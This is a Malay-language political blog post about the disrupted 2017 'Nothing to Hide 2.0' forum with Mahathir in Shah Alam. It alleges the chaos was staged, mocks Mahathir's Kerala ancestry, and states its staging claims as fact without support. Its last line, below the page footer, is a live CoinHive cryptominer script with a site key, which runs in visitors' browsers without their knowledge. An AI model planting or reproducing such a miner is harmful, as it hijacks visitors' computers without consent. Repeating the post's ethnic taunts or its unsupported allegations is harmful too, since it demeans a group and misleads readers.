© Copyright 2017, All Rights Reserved
Home / Blog / Kejadian diatur untuk Kutty lari dari soalan susah

Kejadian diatur untuk Kutty lari dari soalan susah

Kejadian semalam sesuatu yang disengajakan untuk tarik perhatian. Sebelum mula majlis agak anih MC sebut berikut:

“Tuan Tuan dan Puan Puan, saya lupa memintak Tuan-Tuan dan Puan-Puan memberikan tepukan gemuruh kepada brother-brother security atau keselamatan kita pada hari ini. Kita tak mohon, tak jangka atau tak doakan tetapi sekiranya keselamatan kita pada hari ini tergugat, kita mohon abang-abang security mengambil tindakan sewajarnya”.

https://m.facebook.com/story.php?story_fbid=10154963151211448&id=714561447

https://bigdogdotcom.wordpress.com/2017/08/13/volenti-non-fit-injuria/

Majlis soal jawab Mahathir Nothing2Hide tidak ada berapa orang yang hadhir lalu perlu satu insiden untuk tidak dijadikan isu.

Nothing2Hide menunjukkan puak pentaksub gagal untuk terima pandangan berbeza. Ab Jalil Backer menulis:

Nothing to Hide dan Kerusi Terbang

Kekecohan yang berlaku petang tadi bukan perkara terasing membabitkan Tun Mahathir.

Pada 2008 selaku salah seorang penganjur dalam program MYKMU.NET: Pilihan Raya Umum Ke-12 : Satu Penilaian” saya terpaksa naik ke pentas mengugut untuk membatalkan acara tersebut.

Majlis di Hotel Singgahsana, Petaling Jaya tersebut membariskan ucaptama Tun Mahathir Mohamad dan ahli panel Dr Mohamad Khir Toyo, Mukhriz Mahathir dan Poad Zarkashi dihadiri lebih 2000 orang.

Puncanya ada sebahagian penyokong Tun Mahathir dan Datuk Seri Mukhriz Mahathir tidak dapat menerima cadangan dari seorang Ketua Pemuda UMNO Cawangan dari Sekinchan, supaya Tun dan UMNO mempertimbangkan penyatuan dengan Anwar Ibrahim demi bangsa Melayu.

Beliau diserbu oleh beberapa orang yang mahu memukulnya. Mujurlah pasukan keselamatan penganjur cekap melindungi beliau dan membawa beliau keluar.

Segelintir mereka juga “memboo” pandangan Dr Khir Toyo yang tidak selari dengan pandangan Tun Mahathir.

Mereka sukar menerima sebarang pandangan yang bertentangan dengan ideologi Mahathir.

Ironinya, hari ini cadangan Ketua Pemuda UMNO Cawangan dari Sekinchan tersebut diikuti oleh Tun Mahathir.

Justeru kekecohan yang berlaku hari ini tiada kena mengena dengan UMNO, tetapi kerana sikap fanatik segelintir penyokong Tun Mahathir.

https://m.facebook.com/story.php?story_fbid=10214069061660948&id=1244194023

Dalam kejadian ini, ia adalah reaksi Armada terhadap soalan yang ditimbulkan berhubung peristiwa Memali dan mula membalik selipar, kerusi dll.

Mkini laporkan berikut:

Program Nothing to Hide 2.0 yang berlangsung di Shah Alam hari ini bertukar ganas apabila berlaku pergaduhan di dalam dewan tempat berlangsung acara itu.

Kekecohan bermula ketika seorang peserta bertanya kepada Tun Dr Mahathir Mohamad mengenai peristiwa Memali, apabila tiba-tiba kemudian kasut dibaling ke arahnya.

Keadaan menjadi tidak terkawal apabila ada penyokong bertindak balas dengan membaling kerusi di dalam dewan.

Dalam keadaan kelam kabut itu, Dewan Raja Muda Musa di Kompleks Belia & Kebudayaan, Shah Alam yang menjadi lokasi acara itu juga dibakar dengan suar.

Baca selanjutnya: www.malaysiakini.com/news/391793

Madey Kuttycura hanya diri senyum dan begitu tenamg di atas pentas.

Pihak PPBM mendramakan untuk salahkan UMNO:

Sebenarnya:

Memang benar Mahathir Kutty asal Kerala tidak selesa dan cuba mengelak dari soalan2 susah.

Ramai penonton kecewa Madey cuba lari dari menjawab soalan2 susah.

Baca juga soalan Dr Novandri:
http://novandri.blogspot.com/2017/08/nothing-to-hide-2-soalan-bocor-untuk.html

Nampak FMT cuba cover untuk Madey dan salahkan UMNO khususnya Jamal Pak Tongkol

Sudahlah Madey … auta kamu boleh dibaca


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

@TeresaKok And Their DAP Band Of Wagon Can Take The Liquor Control Act From Their PAP Singapore Counterpart For Example

DAP has always regarded Singapore to be better run than Malaysia and ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();